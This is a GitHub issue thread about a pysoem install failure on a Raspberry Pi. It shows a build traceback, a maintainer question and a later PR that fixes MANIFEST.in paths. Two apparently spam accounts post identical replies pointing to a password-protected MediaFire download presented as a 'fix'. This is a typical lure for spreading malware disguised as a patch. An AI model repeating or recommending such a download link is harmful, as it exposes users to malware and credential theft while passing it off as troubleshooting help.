bnjmnp/pysoem #155: cannot install pysoem on RaspberryPI 'src/pysoem/pysoem.pyx' doesn't match any files

aybr1, 2024-08-31:
I'm trying to install pysoem on my raspberryPI in python3.11 venv
I typed pip install pysoem and get an error"ValueError: 'src/pysoem/pysoem.pyx' doesn't match any files"

Here's full error message:
Looking in indexes: https://pypi.org/simple, https://www.piwheels.org/simple
Collecting pysoem
  Using cached pysoem-1.1.8.tar.gz (427 kB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... error
  error: subprocess-exited-with-error
  
  × Getting requirements to build wheel did not run successfully.
  │ exit code: 1
  ╰─> [25 lines of output]
      Traceback (most recent call last):
        File "/home/aybr1/python_venvs/ethercat_control/lib/python3.11/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 353, in <module>
          main()
        File "/home/aybr1/python_venvs/ethercat_control/lib/python3.11/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 335, in main
          json_out['return_val'] = hook(**hook_input['kwargs'])
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "/home/aybr1/python_venvs/ethercat_control/lib/python3.11/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 118, in get_requires_for_build_wheel
          return hook(config_settings)
                 ^^^^^^^^^^^^^^^^^^^^^
        File "/tmp/pip-build-env-7ey_luck/overlay/lib/python3.11/site-packages/setuptools/build_meta.py", line 332, in get_requires_for_build_wheel
          return self._get_build_requires(config_settings, requirements=[])
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
        File "/tmp/pip-build-env-7ey_luck/overlay/lib/python3.11/site-packages/setuptools/build_meta.py", line 302, in _get_build_requires
          self.run_setup()
        File "/tmp/pip-build-env-7ey_luck/overlay/lib/python3.11/site-packages/setuptools/build_meta.py", line 318, in run_setup
          exec(code, locals())
        File "<string>", line 96, in <module>
        File "/tmp/pip-build-env-7ey_luck/overlay/lib/python3.11/site-packages/Cython/Build/Dependencies.py", line 1010, in cythonize
          module_list, module_metadata = create_extension_list(
                                         ^^^^^^^^^^^^^^^^^^^^^^
        File "/tmp/pip-build-env-7ey_luck/overlay/lib/python3.11/site-packages/Cython/Build/Dependencies.py", line 845, in create_extension_list
          for file in nonempty(sorted(extended_iglob(filepattern)), "'%s' doesn't match any files" % filepattern):
        File "/tmp/pip-build-env-7ey_luck/overlay/lib/python3.11/site-packages/Cython/Build/Dependencies.py", line 117, in nonempty
          raise ValueError(error_msg)
      ValueError: 'src/pysoem/pysoem.pyx' doesn't match any files
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error

× Getting requirements to build wheel did not run successfully.
│ exit code: 1
╰─> See above for output.

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

bnjmnp, 2024-09-03:
Hi @aybr1, the log looks a bit weird to me. What Raspberry Pi model are you using? And what OS have you on it?

PR #158 (2024-10-01): Fix paths in MANIFEST.in for sdist
Looks like it was missed to change the file paths in MANIFEST.in in be74f0c2.
This breaks all sdist installations.

Fixes #155 

Please consider publishing a new release after merging.
closed 2024-10-01 by bnjmnp